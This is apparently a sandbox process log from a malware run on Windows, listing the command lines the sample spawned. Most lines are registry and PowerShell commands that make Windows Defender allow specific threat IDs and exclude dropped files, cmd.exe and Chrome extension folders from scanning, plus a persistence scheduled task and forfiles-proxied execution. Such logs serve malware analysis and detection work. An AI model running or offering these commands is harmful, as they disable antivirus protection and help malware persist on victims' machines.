powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD01E.tmp"
C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe'
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Program Files (x86)\1717260008_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260008_0\360TS_Setup.exe" /c:WW.Peter.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
